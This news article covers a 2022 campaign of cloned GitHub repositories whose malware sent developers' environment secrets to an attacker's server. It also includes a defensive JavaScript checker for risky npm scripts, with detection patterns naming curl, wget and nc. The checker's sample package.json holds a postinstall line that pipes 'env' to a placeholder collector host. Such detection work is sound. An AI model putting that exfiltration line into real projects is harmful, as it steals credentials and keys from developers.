A massive GitHub malware attack produced 35,000 “code hits” on the same day that hundreds of wallets with Solana addresses had millions of dollars taken out of them.
So far, the attack has affected several projects, including crypto, Bash, JavaScript, Python, Kubernetes, Golang, and Docker.
GitHub malware attack dupes developers
Stephen Lacy, a GitHub developer who originally reported the problem earlier on Wednesday, underlined the attack’s broad reach. He discovered the problem while looking at a project that he had found via Google.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs
— Stephen Lacy (@stephenlacy) August 3, 2022
The malware attack targets npm scripts (a useful way to group common shell tasks for a project), install docs, and Docker images.
The attacker builds fake repositories by pushing clones of legitimate projects to GitHub. This deceives developers and gives the attacker access to sensitive data. Each fake repository contains all of the project’s contents and the revision history for each file.
Thousands of repos cloned
When the malware runs for a developer, the full environment (ENV) of the script, application, or laptop (Electron applications) is sent to the attacker’s server. The ENV contains crypto keys, Amazon Web Services access, security keys, and other information.
Many of these cloned repositories were pushed as “pull requests”. Pull requests allow developers to notify others about changes they made to a branch in a GitHub repository.
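As an added example (not code from the article or from the developer's report), the following check flags npm scripts that can reach the network, ranking them higher when they also read the environment or run automatically on install. The patterns, severity labels, and sample `package.json` contents are assumptions constructed for illustration.

```javascript
'use strict';

// npm runs these hooks automatically during `npm install`.
const AUTO_RUN = new Set(['preinstall', 'install', 'postinstall', 'prepare']);

// Heuristics chosen for this example (assumptions, not signatures of the real payload).
const NETWORK = /\b(curl|wget|nc)\b|https?:\/\//i;
const ENV_ACCESS = /\b(printenv|env)\b|process\.env|\$\{?[A-Za-z_]/;

// Return one finding per script that can reach the network, ranked by
// whether it also reads the environment and whether npm runs it unprompted.
function auditScripts(pkg) {
  const findings = [];
  for (const [name, cmd] of Object.entries(pkg.scripts || {})) {
    if (!NETWORK.test(cmd)) continue;
    const readsEnv = ENV_ACCESS.test(cmd);
    const autoRun = AUTO_RUN.has(name);
    let severity = 'review';
    if (readsEnv && autoRun) severity = 'high';
    else if (readsEnv || autoRun) severity = 'medium';
    findings.push({ script: name, severity, readsEnv, autoRun, command: cmd });
  }
  return findings;
}

// Constructed package.json contents; the host names are placeholders.
const samplePkg = {
  name: 'constructed-example',
  scripts: {
    build: 'tsc -p .',
    test: 'jest',
    postinstall: 'env | curl -s --data-binary @- https://collector.example.invalid/u',
    docs: 'curl -sO https://example.invalid/schema.json',
  },
};

for (const f of auditScripts(samplePkg)) {
  console.log(`[${f.severity}] ${f.script}: ${f.command}`);
}
```

A finding is a prompt to read the script before running `npm install`, not proof of compromise; legitimate projects also download files from install hooks.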
“Developers should GPG-sign their repository revisions,” the developer said in a GitHub issue report. Each revision coming from a reliable source offers a means of better defense. GPG keys add additional security to GitHub accounts and software projects.
The crypto market has not had a good week. A few hours after the $190 million Nomad bridge hack earlier this week, an estimated $8 million worth of Solana wallets were compromised.